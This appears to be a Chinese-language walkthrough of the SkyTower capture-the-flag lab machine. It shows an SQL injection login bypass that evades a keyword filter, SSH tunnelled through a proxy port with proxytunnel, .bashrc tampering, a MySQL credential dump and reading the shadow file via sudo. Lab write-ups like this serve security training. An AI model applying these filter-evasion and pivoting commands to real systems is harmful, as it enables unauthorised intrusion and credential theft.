Sudo的上级目录提权,SkyTower
主机发现
80探测
端口扫描
目录扫描,没有任何可以利用的信息
admin’ and 1=1 –+
sql注入语法错误,存在sql注入漏洞
万能密码没有用(admin’ or 1=1 –+),发现对or,and,– ,=进行了过滤,只剩下了这些
号测试,没有过滤
那么还有一种写法,就是|| 用这个代替or
登录成功
得到了ssh的账号密码,john / hereisjohn
但是前面我们的22ssh端口是关闭的,该怎么办呢?
3128这个端口呢是一个代理的端口,所以我们用如下代理进行连接ssh
这里我们要用到一个叫代理跳转,现在我们设置一下代理
proxytunnel -a 6666 -p 192.168.111.154:3128 -d 192.168.111.154:22
新建一个终端,,连接本地的6666端口,这时候就成功连接了代理的ssh,但是自动断开了
ssh john@127.0.0.1 -p 6666
这里尝试执行命令,成功,但是会自动断开连接
反弹shell试试
查看当前登录的配置文件
ssh john@127.0.0.1 -p 6666 -t "cat .bashrc"
删除最后一行,还是不行哈,还是有这个东西(exit)
ssh john@127.0.0.1 -p 6666 -t "sed -i '$d' .bashrc"
那么就全部复制到一个文件里面,在kali中
把原来的删了,再使用wget下载
这时候再登录,就成功了
内网信息收集
sudo,SUID
没有思路了就去网站的根目录,看源码
并且进程中还有一个mysql
root/root,登录mysql
三个用户的邮箱和密码都知道了
mysql> select * from login;
+----+---------------------+--------------+
| id | email | password |
+----+---------------------+--------------+
| 1 | john@skytech.com | hereisjohn |
| 2 | sara@skytech.com | ihatethisjob |
| 3 | william@skytech.com | senseable |
+----+---------------------+--------------+我们切换用户sara,Funds have been withdrawn,资金已被撤回
william用户鉴权失败
登录看看,还是要ssh登录哈
和刚刚一模一样
从kali中下载这个bash文件
登录成功
sudo能用
那么久利用它的accounts目录,进行提权,查看shadow密码文件,这东西肯定加了盐的,很难破解出来
$6$rKYhh57q$AVs1wNVSbE5K.IU1Wp9l7Ndg3iPlB7yczctQD6OL9fBZir2ppGDA6v0Vx17xjg.b3zu6mkAVpEN2BuG3wvS2l/
这时候可以直接用sudo查看flag
提权成功!
往期推荐
不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学
ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略
【oscp】vulnerable_docker,三种代理方法打入内网
【内网渗透】CobaltStrike与MSF联动互相上线的方式
本站内容部分转载于互联网,并不代表本站立场!如若本站内容侵犯了原著者的合法权益,可联系我们进行处理! 拒绝任何人以任何形式在本站发表与中华人民共和国法律相抵触的言论!
暂无评论内容